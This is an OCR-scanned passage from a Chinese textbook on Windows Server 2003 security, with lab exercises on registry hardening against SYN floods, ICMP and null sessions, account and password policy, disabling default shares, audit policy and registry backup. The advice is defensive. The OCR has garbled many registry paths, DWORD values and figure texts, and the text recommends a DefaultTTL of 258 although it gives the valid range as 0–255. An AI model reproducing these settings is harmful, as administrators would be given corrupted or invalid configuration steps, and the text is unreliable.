可 以 通过 修改 注册 表 把 一 些 重要 的 文件 或 者 目录 实现 完全 隐藏 。 

HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ Windows\Current-Version\ 
Explorer \Advanced\ Folder\ Hi-dden\SHOWALL, 右 击 CheckedValue 后 选择 “修改 ” 命 
令 , 然 后 把 数值 由 1 改 为 0 即 可 。 


2. 防止 SYN 洪水 攻击 


HKEY LOCAL MACHINEASYSTEMNCurrentControlSetNServicesV Tcpip \Parameters。 
* 新 建 DWORD 值 , 名 为 SynAttackProtect. ffi 9 2. 

* 新 建 EnablePMTUDiscovery REG. DWORD 0, 

* 新 建 NoNameReleaseOnDemand REG. DWORD 1, 

新 建 EnableDeadGWDetect REG. DWORD 0, 

新 建 KeepAliveTime REG DWORD 300.000, 

* 新 建 PerformRouterDiscovery REG DWORD 0, 

新 建 EnableICMPRedirects REG. DWORD 0, 


3. 禁止 响应 ICMP 路 由 通告 报 文 


HKEY LOCAL. MACHINE N SYSTEM N CurrentControlSet V Services V Tcpip V 
Parameters VMnterfacesVinterface, 


。 新 建 DWORD {Ë . 44 8 PerformRouterDiscovery . ffi 2j 0. 
4. 防止 ICMP 重 定向 报 文 的 攻击 


HKEY _ LOCAL _ MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ 
Parameters。 


将 EnableICMPRedirects 值 设 为 0。 
5. 不 支持 IGMP 协议 


HKEY _ LOCAL _ MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ 
Parameters。 


* Bist DWORD 值 ,名 为 IGMPLevel, 值 为 0。 
6. 禁止 IPC 空 连接 


cracker 可 以 利用 net use 命令 建立 空 连接 ,进而 入 侵 ,还 有 net view, nbtstat 这 些 都 是 
基于 空 连接 的 ,禁止 空 连接 就 可 以 防御 入 侵 。 

把 Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 值 改 
成 1 LM 


7. $A TTL f 


黑客 可 以 根据 ping 回 的 TTL 值 大 致 判断 操作 系统 。 

。TTL=128 对 应 (Windows 2000, Windows XP 或 Windows 2003) 。 

。TTL=64 对 应 (Linux) 。 

。TTL=255 对 应 (UNIX) 。 

如 果 有 必要 ,尝试 在 Windows 注册 表 中 将 HKEY LOCAL. MACHINENSYSTEMV 
CurrentControlSetNServicesVTcpipV Parameters; DefaultTTL REG_DWORD 0-0xff(0 一 255， 
十 进 制 ,默认 值 128) 就 改 成 一 个 莫名 其 妙 的 数字 (如 258) ,就 可 以 让 攻击 者 不 能 据 此 判定 使 
用 的 操作 系统 ,或 者 改 为 64, 让 攻击 者 误 以 为 是 Linux 操作 系统 。 


8. 禁止 建立 空 连接 


默认 情况 下 ,任何 用 户 都 可 以 通过 空 连接 连 上 服务 器 ,进而 枚 举 出 账号 ,猜测 密码 。 通 
过 修改 注册 表 可 以 禁止 建立 空 连接 。 

将 Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 的 值 
改 成 1 即 可 。 


实践 


[5:55 8-11 账户 安全 配置 和 系统 安全 设置 


【实验 目的 】 

熟练 掌握 网 络 操作 系统 Windows Server 2003 的 各 种 基本 操作 ,包括 Windows Server 
2003 的 账户 安全 配置 、 系 统 安全 设置 等 基础 及 高 级 安全 配置 方法 。 

【实验 内 容 1】 账户 安全 配置 ,具体 操作 如 下 所 述 。 


1. 账户 授权 


一 个 安全 操作 系统 的 基本 原则 是 最 小 的 权限 十 最 少 的 服务 王 最 大 的 安全 ,因此 应 对 不 
同 用 户 应 授予 不 同 的 权限 ,尽量 降低 每 个 非 授 权 用 户 的 权限 ,使 其 拥有 和 身份 相应 的 权限 。 

设置 用 户 权限 的 原则 是 在 使 用 之 前 将 每 个 硬盘 根 加 上 Administrators 用 户 为 全 部 权 
限 (可 选 加 入 SYSTEM 用 户 ) ,删除 其 他 用 户 。 

(1) 打开 资源 管理 器 , 右 击 某 个 磁盘 盘 符 (如 下 盘 ) 后 选择 “属性 "命令 , 单 击 “安全 ” 标 
签 ,如 图 8-1 所 示 。 

(2) 选择 其 中 一 个 用 户 , 再 根据 需要 勾 选 “允许 ”或 “拒绝 ” 复 选 框 ,如 图 8-2 所 示 。 
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GR Authenticated Vsers 
stsrm 


人 Users 的 权限 


完全 控制 n m" E n n 
修改 n n n n 
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图 8-1 磁盘 安全 性 设置 图 8-2 设置 用 户 权限 


(3) 如 果 没 有 此 用 户 , 单 击 “ 添 加 ”按钮 ,弹出 “选择 用 户 、 计 算 机 或 组 ”对 话 框 ,如 图 8-3 
所 示 , 单 击 “ 高 级 ”按钮 ,再 单 击 “ 立 即 查 找 ” 按 钮 ,随后 在 空白 的 窗 体 中 即 会 出 现 本 机 中 所 有 
用 户 信息 ,如 图 8-4 所 示 ; 选择 其 中 一 个 对 象 名 称 ( 如 Users) 为 要 选择 的 用 户 , 然 后 单 击 
“确定 ”按钮 , Users 即 添 加 到 图 8-5 所 示 的 “组 或 用 户 名 称 ” 列 表 框 中 ,修改 其 合适 的 
权限 。 
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图 8-3 选择 用 户 . 计 算 机 或 组 
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图 8-4 查找 用 户 
如 果 要 删除 某 个 用 户 ,直接 在 图 8-5 中 选择 用 户 后 单 击 “ 删 除 ” 按 钮 即 可 。 
2. 停 用 Guest HA 


由 于 Guest 账号 的 存在 往往 会 给 系统 的 安全 带 来 危害 ,比如 别人 偷偷 把 Guest 激活 后 
作为 后 门 账 号 使 用 ,更 隐蔽 的 是 直接 克隆 成 管理 员 账 号 ,基于 大 多 情况 下 该 账号 是 不 必要 
的 ,所 以 可 以 直接 删除 之 ,以 提高 系统 的 安全 性 ,遗憾 的 是 在 NT 技术 架构 的 Windows 系统 
中 不 允许 直接 删除 Guest 账号 。 但 是 可 以 在 计算 机 管理 的 用 户 里 面 把 Guest 账号 停 用 , 任 
何 时 候 都 不 允许 Guest 账号 登录 系统 ,设置 方法 如 图 8-6 所 示 。 为 了 保险 起 见 ,最 好 给 
Guest 加 一 个 复杂 的 密码 ,可 以 打开 记事 本 ,在 里 面 输入 一 串 包含 特殊 字符 数字、 字母 的 长 
字符 串 , 用 它 作为 Guest 账号 的 密码 ; 并 且 修 改 Guest 账号 的 属性 ,设置 拒绝 远程 访问 ,如 
图 8-7 所 示 。 
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3. 重 命名 或 禁用 Administrator 账户 


Administrator 账户 是 服务 器 上 Administrators 组 的 成 员 , 用 户 永远 也 不 可 以 从 
Administrators 组 删除 Administrator 账户 ,但 可 以 重 命名 或 禁用 该 账户 。 

(1) 重 命 名 : 由 于 已 知道 管理 员 账 户 存在 于 所 有 Windows 2000 Server、Windows 2000 
Professional, Windows XP Professional 和 Windows Server 2003 家 族 的 计算 机 上 ,所 以 重 
命名 该 账户 可 以 使 未 经 授权 的 人 员 在 猜测 此 特权 用 户 名 和 密码 组 合 时 难度 更 大 一 些 。 
Windows 2003 中 的 Administrator 账号 也 不 能 停 用 ,但 是 把 Administrator 账户 改名 是 可 以 
的 。 但 不 要 使 用 Admin 之 类 的 名 字 , 改 了 等 于 没 改 , 应 尽量 把 它 伪装 成 普通 用 户 , 比 如 改 成 
netrooml 等 。 

选择 命令 打开 “本 地 安全 设置 "窗口 ,选择 “本 地 策略 ”>“ 安 全 选项 ”, 在 右 侧 窗 格 中 找到 
“账户 : 重 命 名 系统 管理 员 账 户 ” 选 项 双击 ,在 打开 的 对 话 框 中 即 可 进行 修改 ,然后 单 击 “ 确 
定 ” 按 钮 完成 重 命名 ,如 图 8-8. 

(2) 禁用 管理 员 账 户 : 绝 大 部 分 管理 员 不 会 使 用 本 地 管理 员 账 户 。 相 反 , 他 们 往往 会 
使 用 具有 管理 员 权限 的 用 户 账户 。 除 非 是 无 法 避免 的 情况 下 ,管理 员 们 才 会 通过 网 络 使 用 
本 地 账户 行使 管理 功能 。 

采用 下 面 的 步 又 可 以 禁用 本 地 管理 员 账 户 。 

CD 使 用 管理 员 账 户 或 者 具有 管理 权限 的 用 户 账户 登录 系统 。 

© 布 击 “ 我 的 电脑 "图 标 后 选择 “管理 ”命令 。 

@ 打开 “本 地 用 户 和 组 ”窗口 ,然后 选择 用 户 。 

@ 双击 “管理 员 ”。 

© 匀 选 “禁用 账户 ” 复 选 框 ,然后 单 击 “确定 ”按钮 ,所 修改 的 设置 即 可 立刻 生效 。 

或 者 在 图 8-8 所 示 的 窗口 中 直接 双击 “账户 : 管理 员 账 户 状 态 ” 选 项 ,再 勾 选 “ 禁 用 账 


实践 


户 " 复 选 框 后 单 击 “ 确 定 "按钮 。 
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图 8-8 重 命名 系统 管理 员 账 户 


4. 创建 一 个 陷阱 账户 


创建 一 个 名 为 Administrator 的 本 地 账户 ,把 它 的 权限 设置 成 最 低 , 并 且 加 上 一 个 超过 
10 位 的 超级 复杂 密码 。 这 样 可 以 让 那些 企图 入 侵 者 忙 上 一 段 时 间 了 ,并 且 可 以 借 此 发 现 它 
们 的 入 侵 企图 。 可 以 将 该 用 户 隶 属 的 组 修改 成 Guests 组 。 


5. 把 共享 文件 的 权限 从 Everyone 组 改 为 授权 用 户 


默认 情况 下 ,大 多 数 文件 夹 (包括 所 有 根 目 录 )? 对 所 有 用 户 是 完全 敞开 的 ,可 以 根据 应 用 
的 需要 进行 权限 重 设 。Everyone 在 Windows 2003 中 意味 着 任何 有 权 进 入 网 络 的 用 户 都 能 
够 获得 这 些 共享 资料 。 

任何 时 候 不 要 把 共享 文件 的 用 户 设 置 在 Everyone 组 ,包括 打印 共享 默认 属性 就 是 
Everyone 组 的 ,应 将 共享 文件 的 权限 从 Everyone 组 改 成 “授权 用 户 ”。 设 置 方法 如 下 。 

CD 将 所 有 盘 符 的 权限 全 部 改 为 只 有 administrators 组 及 system 拥有 全 部 权限 。 

(2) E C 盘 的 所 有 子 目录 和 子 文件 继承 C 盘 的 administrator( 组 或 用 户 ) 和 SYSTEM 
所 有 权限 的 两 个 权限 ,然后 做 如 下 修改 。 

* C:\Program Files\Common Files 开放 Everyone 默认 的 读 取 及 运行 、 列 出 文件 目 


录 、 读 取 三 个 权限 ; 
* C:\Windows\ 开 放 Everyone 默认 的 读 取 及 运行 、 列 出 文件 目录 、 读 取 三 个 权限 ; 
* C:\Windows \Temp 开放 Everyone 修改 、 读 取 及 运行 、 列 出 文件 目录 、 读 取 、 写 入 


权限 。 
6. 不 让 系统 显示 上 次 登录 的 用 户 名 


修改 注册 表 禁 止 显 示 上 次 的 登录 名 ,在 HKEY_LOCAL_MACHINE 主键 下 修改 子 键 
Software\ Microsoft\ WindowsNT\CurrentVersion\ Winlogon\ DontDisplayLastUserName 
值 为 1。 

或 者 打开 “本 地 安全 设置 ”窗口 , 单 击 “ 本 地 策略 ” 栏 下 的 “安全 选项 ”项 ,在 右 侧 找 到 “ 交 
互 式 登 录 : 不 显示 上 次 的 用 户 名 ”项 ,如 图 8-9 所 示 。 
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图 8-9 选中 设置 交互 式 登录 方式 


双击 这 个 选项 打开 对 话 框 如 图 8-10 Bros ,选中 “已 启用 ” 单 选 按钮 ,再 单 击 “ 确 定 ” 按 钮 。 
用 这 种 方法 设置 后 系统 会 同时 修改 注册 表 选 项 ,效果 等 同 于 上 面 修改 注册 表 的 方法 。 
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图 8-10 设置 登录 用 户 名 的 显示 属性 


实践 


7. 限制 用 户 数量 


账户 是 黑客 们 入 侵 系统 的 突破 口 ,系统 的 账户 越 多 ,黑客 们 得 到 合法 用 户 权限 的 可 能 性 
一 般 也 就 越 大 。 应 去 掉 所 有 的 测试 账户 、 共 享 账号 和 普通 部 门 账 号 等 。 用 户 组 策略 设置 相 
应 权限 ,并 且 经 常 检查 系统 的 账户 ,删除 已 经 不 使 用 的 账户 。 

对 于 Windows 2003 主机 ,如 果 系 统 账 户 超 过 10 个 ,一般 能 找 出 一 到 两 个 弱 口 令 账 户 ， 
所 以 账户 数量 不 要 大 于 10 个 。 


8. 设置 多 个 管理 员 账 户 


虽然 这 点 看 上 去 和 上 述 规则 有 些 矛盾 ,但 事实 上 是 服从 上 述 规则 的 。 创 建 一 个 一 般 用 
户 权限 账号 用 来 处 理 电子 邮件 以 及 处 理 一 些 日 常事 物 , 另 创 一 个 拥有 Administrator 权限 的 
账户 只 在 需要 的 时 候 使 用 。 因 为 只 要 登录 系统 以 后 ,密码 就 存储 在 Winlogon 进程 中 , 当 有 
其 他 用 户 和 人 侵 计算 机 的 时 候 就 可 以 得 到 登录 用 户 的 密码 ,所 以 应 尽量 减少 Administrator 登 
录 的 次 数 和 时 间 。 

添加 多 个 管理 员 账 户 的 操作 步骤 如 下 。 

(1) 在 Active Directory 中 创建 用 户 账户 ,打开 管理 工具 ,找到 Active Directory 用 户 和 
计算 机 。 在 控制 台 树 中 找到 本 地 域 ,展开 , 右 击 Users 项 后 选择 “新 建 ”~ 用户 ”命令 打开 对 
话 框 ,在 “名 ?文本 框 中 输入 用 户 名 ,在 ”英文 缩写 "文本 框 中 输入 用 户 的 姓名 缩写 ,在 “ 姓 " 文 
本 框 中 输入 用 户 的 姓氏 ,如 图 8-11 所 示 。 


[sene > 


€ OBEE: ^ henengei com/Users 


MD Fe 
ap: þe xveso| — 
MEE [etusert 


MPERA U: 
用 户 登 录 名 Wizdovs 2000 以 前 版 本 ) W): 


emer esr 


& E 0 下 一 步 中 >J Rik | 


图 8-11 新 建 用 户 


(2) 在 “用 户 登录 名 ”文本 框 中 输入 用 户 登录 名 称 , 单 击 右 侧 下 拉 列 表 中 的 UPN 后 级 ， 
然后 单 击 “ 下 一 步 ?按钮 。 

(3) 在 “密码 ”和 “确认 密码 ”文本 框 中 输入 用 户 的 密码 ,然后 选择 适当 的 密码 选项 ,如 
图 8-12 所 示 。 

GERI 如 果 在 设置 密码 时 位 数 过 短 或 者 过 于 简单 ,如 “123465789、adcd” 等 , Active 
Directory 会 提示 密码 满足 不 了 密码 策略 的 要 求 ,如 图 8-13 所 示 。 
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图 8-12 创建 密码 
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图 8-13 ”密码 不 满足 密码 策略 要 求 提示 
(4) BREW administrator 的 权限 ,将 其 权限 设 为 最 低 。 具 体操 作 步 又 同 于 “账户 授权 ” 
的 设置 ,这 是 最 关键 的 一 步 。 
9. 开启 账户 策略 
开启 账户 策略 可 以 有 效 防 止 字典 式 攻 击 , 具 体 设置 如 图 8-14 所 示 。 当 某 一 用 户 连 续 4 
次 登录 失败 时 将 自动 锁定 该 账户 ,30 分 钟 之 后 再 自动 复位 被 锁定 的 账户 。 
"i 本 地 安全 设置 


文件 EE) REW EEV TEBbOD 
ec[&[m| xe E | 2 m 


图 8-14 ”开启 账户 策略 


GARI 如 果 所 使 用 的 Windows 2003 升级 到 域 后 ,administrator 账户 不 能 在 “本 地 安 
全 设置 ”选项 卡 中 修改 组 策略 ,很 多 选项 的 设置 都 是 被 禁用 的 ,如 图 8-15 所 示 。 可 以 采用 如 
下 方法 进行 设置 。 


实践 
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图 8-15 无 法 修改 账户 锁定 策略 
CD 选择 命令 打开 “默认 域 安全 设置 "窗口 ,依次 展开 “安全 设置 "一 “账户 策略 ”节点 选 
择 “ 账 户 锁定 策略 ”项 ,默认 的 策略 属性 值 都 是 没有 定义 的 ,如 图 8-16 所 示 。 
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图 8-16 ”默认 的 账户 锁定 策略 设置 


(2) 右 击 右 侧 窗 格 中 的 任 一 个 账户 锁定 策略 选项 后 选择 “属性 ”命令 ,在 打开 的 对 话 框 
中 进行 设置 。 在 修改 一 个 属性 的 同时 会 弹出 “建议 的 数值 改动 ”对话 框 ,如 图 8-17 所 示 , 单 


击 “* 确 定 ?按钮 ,完成 设置 ,如 图 8-18 Bron o 
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图 8-18 设置 后 的 账户 策略 


实践 
【实验 内 容 2] 
系统 安全 设置 具体 如 下 所 述 。 
1. 密码 安全 设置 


CD 开启 密码 策略 。 密 码 对 系统 安全 非常 重要 ,本 地 安全 设置 中 的 密码 策略 在 默认 情 
况 下 都 没有 开启 。 需 要 开启 的 密码 策略 如 图 8-19 所 示 。 


而 默认 域 安全 设置 
文件 四 WEO EQ) 帮助 中 


图 8-19 设置 密码 策略 


(2) 为 Windows Server 2003 设置 双重 加 密 账户 保护 。 在 “运行 ”对 话 框 中 输入 SYSKEY 
命令 后 按 Enter 键 就 可 以 为 Windows 登录 设置 双重 加 密 窗口 。 


2. 关闭 默认 共享 


默认 共享 是 Windows 2000 及 其 以 上 操作 系统 在 安装 完成 后 自动 打开 的 共享 。 只 要 知 
道 了 网 络 中 一 台 计算 机 的 管理 员 账 号 ,就 可 以 通过 默认 共享 访问 该 计算 机 中 的 资源 。 微 软 
推出 默认 共享 是 为 了 方便 管理 员 管 理 网 络 中 的 计算 机 ,特别 是 在 建立 域 的 网 络 专门 有 几 个 
默认 共享 用 于 存储 用 户 配置 文件 。 然 而 ,任何 事物 都 有 两 面 性 ,在 开启 默认 共 部 方便 管理 的 
同时 ,也 给 计算 机 带 来 了 安全 隐患 。 如 果 知 道 了 管理 员 账 户 与 密码 ,那么 任何 人 都 能 访问 别 
人 的 计算 机 。 这 也 是 为 什么 有 点 安全 常识 的 人 都 会 将 默认 共享 关闭 的 原因 。 通 常情 况 下 系 
统 默 认 共 享 所 有 硬盘 ,如 图 8-20 所 示 。 

这 里 提供 五 种 关闭 默认 共享 的 方法 ,具体 如 下 所 述 。 

COD 右键 “停止 共享 法 : 右 击 图 8-20 所 示 窗 口中 的 某 个 共享 项 (比如 H $ ) 后 选择 “ 停 
止 共享 ”命令 ,确认 后 就 会 关闭 这 个 共享 ,共享 图 标 就 会 消失 ,重复 几 次 操作 即 可 将 所 有 项 目 
都 停止 共享 。 

注意 : 这 种 方法 治标 不 治本 ,如 果 机 器 重启 ,这 些 共享 又 会 恢复 。 此 法 比较 适合 于 “ 永 
不 关闭 ”的 服务 器 ,简单 而 且 有 效 。 

(2) 禁止 默认 共享 : 可 以 在 注册 表 的 以 下 位 置 取消 2003 的 默认 共享 即 可 。 

HKEY_LOCAL_MACHINE\ System \ CurrentControlSet \ Services \ LanmanServer\ 
Parameters AutoShareServer 类 型 是 REG_DWORD, 把 值 改 为 0 即 可 。 

(3) 利用 命令 手动 逐个 删除 共享 : 如 选择 “开始 ”一 “运行” 命令 后 在 “运行 ”对 话 框 中 输 
"net share c(d,e,D $ /del” 命 令 , 然 后 按 Enter 键 即 可 。 
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图 8-20 默认 共享 


(4) 利用 批 处 理 停止 共享 : 打开 记事 本 ,输入 如 下 内 容 


net share c $ /del 
net share d$ /del 


net share admin $ /del 


然后 将 此 记事 本 保存 为 一 个 后 绷 为 bat 的 自动 批 处 理 文件 名 ,再 添加 到 “开始 ”>“ 启 
IPRA F ,每 次 系统 启动 后 就 可 以 自动 删除 这 些 默认 共享 。 再 运行 net share 命令 可 以 以 
发 现 , 默 认 的 共享 已 被 删除 了 。 

(5) 停止 服务 法 : 在 “计算 机 管理 ”窗口 中 展开 左 侧 的 “服务 和 应 用 程序 ”节点 ,选中 “ 服 
务 ” 项 ,此 时 右 侧 窗 格 就 列 出 了 所 有 服务 项 目 。 共 享 服务 对 应 的 名 称 是 Server( 在 进程 中 的 
名 称 为 services) ,找到 后 双击 它 , 在 弹出 对 话 框 的 “常规 "标签 中 把 “启动 类 型 "由 原来 的 “ 自 
动 " 更 改 为 “已 禁用 ”, 然 后 单 击 下 面 “ 服 务 状态 ”的 “停止 ”按钮 ,再 确认 一 下 就 可 以 了 。 


3. 开启 审核 策略 


开启 审核 策略 是 Windows 2003 最 基本 的 入 侵 检测 方法 。 当 有 人 尝试 对 系统 进行 某 种 
方式 (如 尝试 用 户 密码 改变 账户 策略 和 未 经 许可 的 文件 访问 等 ) 的 入 侵 时 ,都 会 被 安全 审核 
记录 下 来 。 

Windows 2003 下 的 审核 策略 默认 是 没有 开启 的 ,所 以 这 也 是 很 多 服务 器 (尤其 是 使 用 
Windows 2000 的 服务 器 ) 系 统 被 入侵 了 几 个 月 管理 员 都 不 知道 的 原因 。 如 图 8-21 中 的 这 
些 审核 都 是 必须 开启 的 ( 即 成 功 和 失败 都 应 该 是 打开 的 ) ,其 他 可 以 根据 需要 增加 。 

只 有 打开 了 这 些 审核 策略 ,在 “管理 工具 ”的 “事件 查看 器 ”中 才能 看 到 系统 日 志 、 安 全 日 
志 及 应 用 程序 日 志文 件 的 记录 ,如 图 8-22 所 示 ; 否则 即使 系统 被 人 侵 了 也 无 法 查找 到 入 
侵 源 。 


实践 
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图 8-22 事件 查看 器 


【提示 】 如 果 在 设置 审核 策略 时 出 现 打开 的 审核 策略 无 法 修改 的 情况 ,需要 打开 “默认 
域 安全 设置 窗口 ,依次 展开 “安全 设置 ">“ 本 地 策略 ”节点 选择 “审核 策略 ”, 完 成 修改 后 的 
策略 设置 后 “本 地 安全 设置 "窗口 中 也 会 发 生 改 变 , 如 图 8-21 所 示 。 


4. 加 密 Temp 文件 夹 


一 些 应 用 程序 在 安装 和 升级 的 时 候 , 会 把 一 些 东西 复制 到 Temp 文件 夹 ,但 是 当 程 序 升 
级 完毕 或 关闭 的 时 候 , 并 不 会 自己 清除 Temp 文件 夹 的 内 容 。 所 以 ,给 Temp 文件 夹 加 密 可 
以 给 文件 多 一 层 保护 。 其 他 文件 夹 的 加 密 方法 同 于 加 密 Temp 文件 夹 的 方法 ,具体 操作 
如 下 。 

右 击 temp 文件 夹 后 选择 “属性 ” 窗 体 命令 打开 对 话 框 ,如 图 8-23 所 示 ; 单 击 “ 高 级 ” 按 


钮 , 勾 选 *“ 加 密 内 容 以 便 保护 数据 ”" 复 选 框 ,如 图 8-24 所 示 ; 单 击 “ 确 定 ” 按 钮 ,并 将 此 属性 应 
用 于 所 有 的 子 文件 夹 及 文件 ,如 图 8-25 所 示 。 
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图 8-23 TEMP 属性 
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只 将 该 更 改 应 用 于 该 文件 赤 ， 还 是 同时 应 用 于 所 有 子 文 件 夹 和 文件 ? 
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图 8-24 设置 TEMP 加 密 属性 图 8-25 将 加 密 属性 应 用 于 该 文件 夹 及 
子 文件 夹 和 文件 


注册 表 的 备份 ,恢复 和 维护 


【实验 目的 】 

练习 注册 表 的 备份 .恢复 和 维护 等 操作 。 
【实验 内 容 1] 

注册 表 备 份 , 具 体操 作 如 下 所 述 。 


实践 


1. 使 用 Windows 命令 备份 恢复 注册 表 


CD 在 “运行 "对话 框 中 输入 regedit 或 regedt32 后 按 Enter 键 ,或 者 在 Windows 目录 
下 双击 regedit. exe 打开 注册 表 编辑 器 ,如 图 8-26 所 示 o 
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图 8-26 ”注册 表 编 辑 器 


(2) 选择 “文件 ”>“ 导 出 ”命令 ,在 弹出 的 对 话 框 中 输入 文件 名 为 regedit, 将 “保存 类 型 ” 
选 为 默认 的 “注册 文件 ”,“ 导 出 范围 ”也 设置 为 默认 的 “全 部 ”, 接 下 来 选择 文件 存储 位 置 , 最 
后 单 击 “ 保 存 ” 按 钮 ,就 可 将 系统 的 注册 表 备 份 保存 到 硬盘 上 。 

上 面 提 到 的 备份 指 的 是 备份 全 部 注册 表 , 也 可 备份 局 部 注册 表 : 先 选中 需要 备份 的 主 
键 分 支 ,然后 再 “导出 ”注册 表 文件 ,这 时 在 “导出 范围 "下 自动 选择 成 “选择 的 分 支 ”并 已 输入 
了 相应 的 主键 值 ,输入 文件 名 后 单 击 “ 确 定 ” 按 钮 , 便 生成 了 扩展 名 为 reg 的 注册 表 文 件 , 如 
图 8-27 所 示 。 


导出 广 册 表 文件 
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注册 文件 f reg) 可 取消 | 


C MEHED 


[HKEY CURRENT USER\Software 


图 8-27 备份 部 分 分 支 注册 表 
由 于 Windows 2003 的 注册 表 编 辑 器 是 带 有 权限 限制 的 ,所 以 当选 中 一 个 键 值 的 时 候 ， 


选择 “编辑 ”权限 ”命令 ,会 出 现 图 8-28 所 示 的 对 话 框 , 分 别 为 用 户 组 修改 不 同 的 权限 限 
制 , 单 击 “确定 ”按钮 。 
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图 8-28 ”注册 表 用 户 权限 


2. 使 用 ERUNT 注册 表 备 份 软件 备份 


(1) 下 载 ERUNT 软件 ,解压 后 双击 ERUNT. EXE 图 标 ,出 现 “ 欢 迎 ” 对 话 框 ,如 图 8-29 
所 示 。 信 息 提示 是 用 来 备份 Windows NT/2000/XP 的 ,其 实 也 可 以 用 此 软件 来 备份 
Windows 2003 的 注册 表 。 


图 8-29 欢迎 界面 


(2) 选择 注册 表 要 备份 到 的 位 置 和 名 称 , 默 认为 Windows 安装 路 径 下 的 ERUNT H 
录 , 如 图 8-30 所 示 ; 并 提问 是 否 创建 当日 的 日 期 文件 夹 , 单 击 * 是 ?按钮 ,注册 表 即 可 开始 备 
份 ,如 图 8-31 所 示 ,直到 备份 完成 ,如 图 8-32 所 示 。 


EBV for Windows NT 


图 8-30 选择 备份 位 置 


实践 
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图 8-31 正在 创建 备份 注册 表 
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以 后 若 要 恢复 注册 表 , 
AAXCPES D: WIMDONSVERDNT 2002-86-23 中 运行 ERDNT 程序 即 可 。 
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图 8-32 ”完成 备份 注册 表 


【实验 内 容 2] 

注册 表 恢 复 具 体操 作 如 下 所 述 。 

CD 恢复 注册 表 的 方法 基本 同 于 备份 方法 。 打 开 * 注 册 表 编辑 器 ”, 选 择 " 文 件 ” 导 
入 ”命令 ,找到 备份 注册 表 文件 的 位 置 ,选择 的 注册 表 备 份 文件 会 覆盖 当前 的 注册 表 文 
件 。 关 闭 * 注 册 表 编辑 器 ”后 ,当前 Windows 的 所 有 设置 会 全 部 恢复 到 原来 备份 的 系统 

有 时 系统 在 运行 过 程 中 某 些 软 硬 件 工 作 不 正常 ,或 者 当 注 册 表 损坏 或 错误 更 改 了 软 硬 
件 设置 ,导致 系统 启动 失败 时 ,可 将 以 前 导出 的 注册 表 文 件 再 导入 注册 表 。 

GERI 如 果 用 户 没有 把 握 ,切记 在 修改 之 前 一 定 要 备份 注册 表 。 

(2) 预防 对 Windows Server 2003 的 远程 注册 表 的 扫描 

通常 默认 状态 下 ,Windows Server 2003 的 远程 注册 表 访 问 路 径 不 是 空 的 ,黑客 很 容易 
利用 扫描 器 通过 远程 注册 表 访 问 系统 中 的 相关 信息 。 为 了 安全 起 见 , 应 该 将 远程 可 以 访问 
到 的 注册 表 路 径 全 部 清除 ,以 便 切 断 远 程 扫描 通道 。 操 作 方法 如 下 : 

在 “运行 ”对 话 框 中 输入 gpedit. msc 后 按 Enter 键 打开 “组 策略 编辑 器 ”窗口 ,依次 后 展 
开 “ 计 算 机 配置 ">“Windows 设置 ”>“ 安 全 设置 ">“ 本 地 策略 ”>“ 安 全 选项 ”项 ,在 右 侧 窗 
格 中 双击 “网 络 访问 : 可 远程 访问 的 注册 表 路 径 和 子路 径 ” 项 ,在 打开 的 对 话 框 中 将 远程 可 
以 访问 到 的 注册 表 路 径 信息 全 部 清除 ,如 图 8-33 所 示 。 

【实验 内 容 3] 

注册 表 的 维护 具体 操作 如 下 所 述 。 

D 超 强 注册 表 维 护 工具 Wise Registry Cleaner 

Wise Registry Cleaner 提供 了 实用 的 注册 表 修 复 及 清理 功能 ,可 以 有 针对 性 地 检测 注 
册 表 问题 ,并 对 其 进行 修复 或 者 清理 .让 电脑 一 直 在 最 佳 状态 运行 。 使 用 Wise Registry 
Cleaner 进行 注册 表 的 维护 ,用户 只 需 简 单单 击 鼠 标 就 可 以 安全 实现 。 

以 Wise Registry Cleaner v5. 71 绿色 中 文 版 为 例 , 下 载 Wise Registry Cleaner 压缩 包 
后 解压 ,直接 双击 Wise Registry Cleaner 图 标 ,首先 会 看 到 选择 语言 窗口 ,选择 Chinese 


(Simplified) 即 可 。 单 击 OK 按钮 ,打开 Wise Registry Cleaner v5. 71 主 界面 ,如 图 8-34 所 示 。 
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图 8-33 ”预防 对 远程 注册 表 的 扫描 
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图 8-34 Wise Registry Cleaner v5. 71 主 界面 


实践 


CD 扫描 : 单 击 “ 扫 描 " 按 钮 , 即 可 开始 一 个 新 的 扫描 ,执行 对 已 勾 选 的 注册 表 问 题 的 检 
测 , 如 图 8-35 所 示 是 执行 注册 表 扫描 的 过 程 。 建 议 初学 者 进行 注册 表 维 护 时 ,按照 主 界面 
左 侧 窗 格 的 注册 表 故 障 类 别 或 选项 的 默认 选择 进行 检测 与 修复 。 
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图 8-35 ”注册 表 的 扫描 过 程 


Wise Registry Cleaner 的 扫描 结果 如 图 8-36 所 示 。 扫 描 过 程 结束 后 ,检查 所 有 被 检测 
到 的 注册 表 问 题 ,检测 到 的 注册 表 问 题 中 可 以 被 安全 修复 的 安全 条 目 已 经 被 默认 勾 选 , 但 是 
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图 8-36 ”扫描 结束 


仍 有 不 安全 条 目 默认 状态 下 没有 勾 选 ,需要 用 户 进行 手动 选择 处 理 。 虽 然 不 安全 条 目 可 以 
修复 ,但 是 程序 不 能 保证 是 完全 安全 的 ,因此 需要 用 户 进行 手动 选择 。 

(2) 修复 : 使 用 Wise Registry Cleaner 检测 到 注册 表 问 题 后 ,只 需 单 击 “ 修 复 ” 按 钮 , 即 
可 对 已 选择 的 被 检测 的 注册 表 问 题 的 进行 修复 及 清理 操作 ,如 图 8-37 所 示 。 修 复 完 可 以 看 
到 剩 下 的 未 被 默认 选择 的 不 安全 条 目 , 此 时 用 户 可 以 手动 色 选 它们 进行 处 理 或 者 放弃 对 它 
们 的 处 理 。 
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完成 711 问题 已 经 被 修复 ”711 是 能 被 安全 出 除 的 条 目 0 是 不 完全 实 全 的 条 目 BRAM 


图 8-37 执行 修复 


此 外 ,由 于 注册 表 修 复 及 清理 操作 有 一 定 的 风险 ,因此 最 好 在 执行 修复 清理 操作 前 备份 
当前 系统 注册 表 , 万 一 发 现 注册 表 清 理 后 发 生 故 障 ,可 以 及 时 将 其 恢复 到 执行 操作 前 的 稳定 
状态 。 备 份 的 界面 如 图 8-38 所 示 。 


图 8-38 ”使 用 Wise Registry Cleaner 备份 


2) RegSupreme 

RegSupreme 是 一 个 可 以 用 来 清除 Windows 注册 表 文件 的 工具 。 当 执行 完 这 个 工具 
